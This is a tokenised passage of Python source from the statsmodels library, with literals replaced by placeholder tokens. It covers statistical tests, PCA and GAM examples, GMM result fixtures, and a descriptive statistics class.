<NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> ] ) <EOL> pdf_st = skewt . pdf ( x , <NUM_LIT:1> , <NUM_LIT:10> ) <EOL> assert_ ( np . allclose ( pdf_st , pdf_r , rtol = <NUM_LIT> , atol = <NUM_LIT> ) ) <EOL> cdf_r = np . array ( [ <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> ] ) <EOL> cdf_st = skewt . cdf ( x , <NUM_LIT:1> , <NUM_LIT:10> ) <EOL> assert_ ( np . allclose ( cdf_st , cdf_r , rtol = <NUM_LIT> , atol = <NUM_LIT> ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> import nose <EOL> nose . runmodule ( argv = [ '<STR_LIT:__main__>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> exit = False ) <EOL> print ( '<STR_LIT>' ) <EOL> '''<STR_LIT>''' </s>
<s> '''<STR_LIT>''' <EOL> import numpy as np <EOL> from numpy . testing import assert_array_almost_equal <EOL> import statsmodels . api as sm <EOL> from statsmodels . sandbox . tools import pca <EOL> from statsmodels . sandbox . tools . cross_val import LeaveOneOut <EOL> nobs = <NUM_LIT:1000> <EOL> f0 = np . c_ [ np . random . normal ( size = ( nobs , <NUM_LIT:2> ) ) , np . ones ( ( nobs , <NUM_LIT:1> ) ) ] <EOL> f2xcoef = np . c_ [ np . repeat ( np . eye ( <NUM_LIT:2> ) , <NUM_LIT:2> , <NUM_LIT:0> ) , np . arange ( <NUM_LIT:4> ) [ : : - <NUM_LIT:1> ] ] . T <EOL> f2xcoef = np . array ( [ [ <NUM_LIT:1.> , <NUM_LIT:1.> , <NUM_LIT:0.> , <NUM_LIT:0.> ] , <EOL> [ <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:1.> , <NUM_LIT:1.> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1.> , <NUM_LIT:0.> ] ] ) <EOL> f2xcoef = np . array ( [ [ <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT:1.> , <NUM_LIT:0.> ] , <EOL> [ <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT:0.1> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1.> , <NUM_LIT:0.> ] ] ) <EOL> x0 = np . dot ( f0 , f2xcoef ) <EOL> x0 += <NUM_LIT:0.1> * np . random . normal ( size = x0 . shape ) <EOL> ytrue = np . dot ( f0 , [ <NUM_LIT:1.> , <NUM_LIT:1.> , <NUM_LIT:1.> ] ) <EOL> y0 = ytrue + <NUM_LIT:0.1> * np . random . normal ( size = ytrue . shape ) <EOL> xred , fact , eva , eve = pca ( x0 , keepdim = <NUM_LIT:0> ) <EOL> print ( eve ) <EOL> print ( fact [ : <NUM_LIT:5> ] ) <EOL> print ( f0 [ : <NUM_LIT:5> ] ) <EOL> import statsmodels . api as sm <EOL> res = sm . OLS ( y0 , sm . add_constant ( x0 , prepend = False ) ) . fit ( ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( res . params ) <EOL> print ( res . aic ) <EOL> print ( res . rsquared ) <EOL> print ( '<STR_LIT>' ) <EOL> results = [ ] <EOL> xred , fact , eva , eve = pca ( x0 , keepdim = <NUM_LIT:0> , normalize = <NUM_LIT:1> ) <EOL> for k in range ( <NUM_LIT:0> , x0 . shape [ <NUM_LIT:1> ] + <NUM_LIT:1> ) : <EOL> fact_wconst = sm . add_constant ( fact [ : , : k ] , prepend = False ) <EOL> res = sm . OLS ( y0 , fact_wconst ) . fit ( ) <EOL> prederr2 = <NUM_LIT:0.> <EOL> for inidx , outidx in LeaveOneOut ( len ( y0 ) ) : <EOL> resl1o = sm . OLS ( y0 [ inidx ] , fact_wconst [ inidx , : ] ) . fit ( ) <EOL> prederr2 += ( y0 [ outidx ] - resl1o . predict ( fact_wconst [ outidx , : ] ) ) ** <NUM_LIT> <EOL> results . append ( [ k , res . aic , res . bic , res . rsquared_adj , prederr2 ] ) <EOL> results = np . array ( results ) <EOL> print ( results ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( np . r_ [ ( np . argmin ( results [ : , <NUM_LIT:1> : <NUM_LIT:3> ] , <NUM_LIT:0> ) , np . argmax ( results [ : , <NUM_LIT:3> ] , <NUM_LIT:0> ) , <EOL> np . argmin ( results [ : , - <NUM_LIT:1> ] , <NUM_LIT:0> ) ) ] ) <EOL> from statsmodels . iolib . table import ( SimpleTable , default_txt_fmt , <EOL> default_latex_fmt , default_html_fmt ) <EOL> headers = '<STR_LIT>' . split ( '<STR_LIT:U+002CU+0020>' ) <EOL> numformat = [ '<STR_LIT>' ] + [ '<STR_LIT>' ] * <NUM_LIT:4> <EOL> txt_fmt1 = dict ( data_fmts = numformat ) <EOL> tabl = SimpleTable ( results , headers , None , txt_fmt = txt_fmt1 ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( tabl ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> from statsmodels . compat . python import lrange , zip <EOL> import time <EOL> import numpy as np <EOL> from numpy . testing import assert_almost_equal <EOL> from scipy import stats <EOL> from statsmodels . sandbox . gam import AdditiveModel <EOL> from statsmodels . sandbox . gam import Model as GAM <EOL> from statsmodels . genmod import families <EOL> from statsmodels . genmod . generalized_linear_model import GLM <EOL> from statsmodels . regression . linear_model import OLS , WLS <EOL> np . random . seed ( <NUM_LIT> ) <EOL> order = <NUM_LIT:3> <EOL> sigma_noise = <NUM_LIT:0.5> <EOL> nobs = <NUM_LIT:1000> <EOL> lb , ub = - <NUM_LIT> , <NUM_LIT:4> <EOL> x1 = np . linspace ( lb , ub , nobs ) <EOL> x2 = np . sin ( <NUM_LIT:2> * x1 ) <EOL> x = np . column_stack ( ( x1 / x1 . max ( ) * <NUM_LIT:2> , x2 ) ) <EOL> exog = ( x [ : , : , None ] ** np . arange ( order + <NUM_LIT:1> ) [ None , None , : ] ) . reshape ( nobs , - <NUM_LIT:1> ) <EOL> idx = lrange ( ( order + <NUM_LIT:1> ) * <NUM_LIT:2> ) <EOL> del idx [ order + <NUM_LIT:1> ] <EOL> exog_reduced = exog [ : , idx ] <EOL> y_true = exog . sum ( <NUM_LIT:1> ) / <NUM_LIT> <EOL> z = y_true <EOL> d = x <EOL> y = y_true + sigma_noise * np . random . randn ( nobs ) <EOL> example = <NUM_LIT:1> <EOL> if example == <NUM_LIT:1> : <EOL> m = AdditiveModel ( d ) <EOL> m . fit ( y ) <EOL> y_pred = m . results . predict ( d ) <EOL> for ss in m . smoothers : <EOL> print ( ss . params ) <EOL> res_ols = OLS ( y , exog_reduced ) . fit ( ) <EOL> print ( res_ols . params ) <EOL> if example > <NUM_LIT:0> : <EOL> import matplotlib . pyplot as plt <EOL> plt . figure ( ) <EOL> plt . plot ( exog ) <EOL> y_pred = m . results . mu <EOL> plt . figure ( ) <EOL> plt . subplot ( <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:1> ) <EOL> plt . plot ( y , '<STR_LIT:.>' , alpha = <NUM_LIT> ) <EOL> plt . plot ( y_true , '<STR_LIT>' , label = '<STR_LIT:true>' ) <EOL> plt . plot ( res_ols . fittedvalues , '<STR_LIT>' , label = '<STR_LIT>' , lw = <NUM_LIT:2> , alpha = - <NUM_LIT> ) <EOL> plt . plot ( y_pred , '<STR_LIT>' , label = '<STR_LIT>' ) <EOL> plt . legend ( loc = '<STR_LIT>' ) <EOL> plt . title ( '<STR_LIT>' ) <EOL> counter = <NUM_LIT:2> <EOL> for ii , xx in zip ( [ '<STR_LIT:z>' , '<STR_LIT>' , '<STR_LIT>' ] , [ z , x [ : , <NUM_LIT:0> ] , x [ : , <NUM_LIT:1> ] ] ) : <EOL> sortidx = np . argsort ( xx ) <EOL> plt . subplot ( <NUM_LIT:2> , <NUM_LIT:2> , counter ) <EOL> plt . plot ( xx [ sortidx ] , y [ sortidx ] , '<STR_LIT:.>' , alpha = <NUM_LIT> ) <EOL> plt . plot ( xx [ sortidx ] , y_true [ sortidx ] , '<STR_LIT>' , label = '<STR_LIT:true>' , lw = <NUM_LIT:2> ) <EOL> plt . plot ( xx [ sortidx ] , y_pred [ sortidx ] , '<STR_LIT>' , label = '<STR_LIT>' ) <EOL> plt . legend ( loc = '<STR_LIT>' ) <EOL> plt . title ( '<STR_LIT>' + ii ) <EOL> counter += <NUM_LIT:1> <EOL> plt . show ( ) </s>
<s> '''<STR_LIT>''' <EOL> import numpy as np <EOL> est = dict ( <EOL> rank = <NUM_LIT> , <EOL> N = <NUM_LIT> , <EOL> Q = <NUM_LIT> , <EOL> J = <NUM_LIT> , <EOL> J_df = <NUM_LIT:2> , <EOL> k_1 = <NUM_LIT> , <EOL> converged = <NUM_LIT:1> , <EOL> has_xtinst = <NUM_LIT:0> , <EOL> type = <NUM_LIT:1> , <EOL> n_eq = <NUM_LIT:1> , <EOL> k = <NUM_LIT> , <EOL> n_moments = <NUM_LIT:15> , <EOL> k_aux = <NUM_LIT> , <EOL> k_eq_model = <NUM_LIT:0> , <EOL> k_eq = <NUM_LIT> , <EOL> cmdline = "<STR_LIT>" , <EOL> cmd = "<STR_LIT>" , <EOL> estat_cmd = "<STR_LIT>" , <EOL> predict = "<STR_LIT>" , <EOL> marginsnotok = "<STR_LIT>" , <EOL> eqnames = "<STR_LIT:1>" , <EOL> technique = "<STR_LIT>" , <EOL> winit = "<STR_LIT>" , <EOL> estimator = "<STR_LIT>" , <EOL> wmatrix = "<STR_LIT>" , <EOL> vce = "<STR_LIT>" , <EOL> vcetype = "<STR_LIT>" , <EOL> params = "<STR_LIT>" , <EOL> inst_1 = "<STR_LIT>" , <EOL> params_1 = "<STR_LIT>" , <EOL> sexp_1 = "<STR_LIT>" , <EOL> properties = "<STR_LIT>" , <EOL> ) <EOL> params_table = np . array ( [ <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , np . nan , <NUM_LIT> , <EOL> <NUM_LIT:0> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , np . nan , <EOL> <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> np . nan , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , np . nan , <NUM_LIT> , <NUM_LIT:0> , <EOL> - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <EOL> - <NUM_LIT> , - <NUM_LIT> , np . nan , <NUM_LIT> , <EOL> <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , np . nan , <EOL> <NUM_LIT> , <NUM_LIT:0> , - <NUM_LIT> , <NUM_LIT> , <EOL> - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <EOL> np . nan , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , np . nan , <NUM_LIT> , <NUM_LIT:0> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , np . nan , <NUM_LIT> , <EOL> <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , np . nan , <EOL> <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <EOL> np . nan , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , np . nan , <NUM_LIT> , <NUM_LIT:0> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , np . nan , <NUM_LIT> , <EOL> <NUM_LIT:0> ] ) . reshape ( <NUM_LIT> , <NUM_LIT:9> ) <EOL> params_table_colnames = '<STR_LIT>' . split ( ) <EOL> params_table_rownames = '<STR_LIT>' . split ( ) <EOL> cov = np . array ( [ <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <EOL> - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <EOL> - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <EOL> - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <EOL> - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <EOL> - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> ] ) . reshape ( <NUM_LIT> , <NUM_LIT> ) <EOL> cov_colnames = '<STR_LIT>' . split ( ) <EOL> cov_rownames = '<STR_LIT>' . split ( ) <EOL> class Bunch ( dict ) : <EOL> def __init__ ( self , ** kw ) : <EOL> dict . __init__ ( self , kw ) <EOL> self . __dict__ = self <EOL> for i , att in enumerate ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) : <EOL> self [ att ] = self . params_table [ : , i ] <EOL> results_twostep = Bunch ( <EOL> params_table = params_table , <EOL> params_table_colnames = params_table_colnames , <EOL> params_table_rownames = params_table_rownames , <EOL> cov = cov , <EOL> cov_colnames = cov_colnames , <EOL> cov_rownames = cov_rownames , <EOL> ** est <EOL> ) <EOL> est = dict ( <EOL> rank = <NUM_LIT> , <EOL> N = <NUM_LIT> , <EOL> Q = <NUM_LIT> , <EOL> J = <NUM_LIT> , <EOL> J_df = <NUM_LIT:2> , <EOL> k_1 = <NUM_LIT> , <EOL> converged = <NUM_LIT:1> , <EOL> has_xtinst = <NUM_LIT:0> , <EOL> type = <NUM_LIT:1> , <EOL> n_eq = <NUM_LIT:1> , <EOL> k = <NUM_LIT> , <EOL> n_moments = <NUM_LIT:15> , <EOL> k_aux = <NUM_LIT> , <EOL> k_eq_model = <NUM_LIT:0> , <EOL> k_eq = <NUM_LIT> , <EOL> cmdline = "<STR_LIT>" , <EOL> cmd = "<STR_LIT>" , <EOL> estat_cmd = "<STR_LIT>" , <EOL> predict = "<STR_LIT>" , <EOL> marginsnotok = "<STR_LIT>" , <EOL> eqnames = "<STR_LIT:1>" , <EOL> technique = "<STR_LIT>" , <EOL> winit = "<STR_LIT>" , <EOL> estimator = "<STR_LIT>" , <EOL> wmatrix = "<STR_LIT>" , <EOL> vce = "<STR_LIT>" , <EOL> vcetype = "<STR_LIT>" , <EOL> params = "<STR_LIT>" , <EOL> inst_1 = "<STR_LIT>" , <EOL> params_1 = "<STR_LIT>" , <EOL> sexp_1 = "<STR_LIT>" , <EOL> properties = "<STR_LIT>" , <EOL> ) <EOL> params_table = np . array ( [ <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , np . nan , <NUM_LIT> , <EOL> <NUM_LIT:0> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , np . nan , <EOL> <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> np . nan , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , np . nan , <NUM_LIT> , <NUM_LIT:0> , <EOL> - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <EOL> - <NUM_LIT> , - <NUM_LIT> , np . nan , <NUM_LIT> , <EOL> <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , np . nan , <EOL> <NUM_LIT> , <NUM_LIT:0> , - <NUM_LIT> , <NUM_LIT> , <EOL> - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <EOL> np . nan , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , np . nan , <NUM_LIT> , <NUM_LIT:0> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , np . nan , <NUM_LIT> , <EOL> <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , np . nan , <EOL> <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <EOL> np . nan , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , np . nan , <NUM_LIT> , <NUM_LIT:0> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , np . nan , <NUM_LIT> , <EOL> <NUM_LIT:0> ] ) . reshape ( <NUM_LIT> , <NUM_LIT:9> ) <EOL> params_table_colnames = '<STR_LIT>' . split ( ) <EOL> params_table_rownames = '<STR_LIT>' . split ( ) <EOL> cov = np . array ( [ <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <EOL> - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <EOL> - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <EOL> - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <EOL> - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <EOL> - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> ] ) . reshape ( <NUM_LIT> , <NUM_LIT> ) <EOL> cov_colnames = '<STR_LIT>' . split ( ) <EOL> cov_rownames = '<STR_LIT>' . split ( ) <EOL> results_onestep = Bunch ( <EOL> params_table = params_table , <EOL> params_table_colnames = params_table_colnames , <EOL> params_table_rownames = params_table_rownames , <EOL> cov = cov , <EOL> cov_colnames = cov_colnames , <EOL> cov_rownames = cov_rownames , <EOL> ** est <EOL> ) </s>
<s> '''<STR_LIT>''' <EOL> from . tools_pca import * </s>
<s> from statsmodels . compat . python import lrange , lmap , iterkeys , iteritems <EOL> import numpy as np <EOL> from scipy import stats <EOL> from statsmodels . iolib . table import SimpleTable <EOL> from statsmodels . tools . decorators import nottest <EOL> def _kurtosis ( a ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> res = stats . kurtosis ( a ) <EOL> except ValueError : <EOL> res = np . nan <EOL> return res <EOL> def _skew ( a ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> res = stats . skew ( a ) <EOL> except ValueError : <EOL> res = np . nan <EOL> return res <EOL> _sign_test_doc = '''<STR_LIT>''' <EOL> @ nottest <EOL> def sign_test ( samp , mu0 = <NUM_LIT:0> ) : <EOL> samp = np . asarray ( samp ) <EOL> pos = np . sum ( samp > mu0 ) <EOL> neg = np . sum ( samp < mu0 ) <EOL> M = ( pos - neg ) / <NUM_LIT> <EOL> p = stats . binom_test ( min ( pos , neg ) , pos + neg , <NUM_LIT> ) <EOL> return M , p <EOL> sign_test . __doc__ = _sign_test_doc <EOL> class Describe ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , dataset ) : <EOL> self . dataset = dataset <EOL> self . univariate = dict ( <EOL> obs = [ len , None , None ] , <EOL> mean = [ np . mean , None , None ] , <EOL> std = [ np . std , None , None ] , <EOL> min = [ np . min , None , None ] , <EOL> max = [ np . max , None , None ] , <EOL> ptp = [ np . ptp , None , None ] , <EOL> var = [ np . var , None , None ] , <EOL> mode_val = [ self . _mode_val , None , None ] , <EOL> mode_bin = [ self . _mode_bin , None , None ] , <EOL> median = [ np . median , None , None ] , <EOL> skew = [ stats . skew , None , None ] , <EOL> uss = [ lambda x : np . sum ( np . asarray ( x ) ** <NUM_LIT:2> , axis = <NUM_LIT:0> ) , None , None ] , <EOL> kurtosis = [ stats . kurtosis , None , None ] , <EOL> percentiles = [ self . _percentiles , None , None ] , <EOL> ) <EOL> self . _arraytype = None <EOL> self . _columns_list = None <EOL> def _percentiles ( self , x ) : <EOL> p = [ stats . scoreatpercentile ( x , per ) for per in <EOL> ( <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:10> , <NUM_LIT> , <NUM_LIT:50> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> return p <EOL> def _mode_val ( self , x ) : <EOL> return stats . mode ( x ) [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> def _mode_bin ( self , x ) : <EOL> return stats . mode ( x ) [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> def _array_typer ( self ) : <EOL> """<STR_LIT>""" <EOL> if not ( self . dataset . dtype . names ) : <EOL> """<STR_LIT>""" <EOL> self . _arraytype = '<STR_LIT>' <EOL> elif self . dataset . dtype . names : <EOL> """<STR_LIT>""" <EOL> self . _arraytype = '<STR_LIT>' <EOL> else : <EOL> assert self . _arraytype == '<STR_LIT>' or self . _arraytype == '<STR_LIT>' <EOL> def _is_dtype_like ( self , col ) : <EOL> """<STR_LIT>""" <EOL> def string_like ( ) : <EOL> try : <EOL> self . dataset [ col ] [ <NUM_LIT:0> ] + '<STR_LIT>' <EOL> except ( TypeError , ValueError ) : <EOL> return False <EOL> return True <EOL> def number_like ( ) : <EOL> try : <EOL> self . dataset [ col ] [ <NUM_LIT:0> ] + <NUM_LIT:1.0> <EOL> except ( TypeError , ValueError ) : <EOL> return False <EOL> return True <EOL> if number_like ( ) == True and string_like ( ) == False : <EOL> return '<STR_LIT>' <EOL> elif number_like ( ) == False and string_like ( ) == True : <EOL> return '<STR_LIT:string>' <EOL> else : 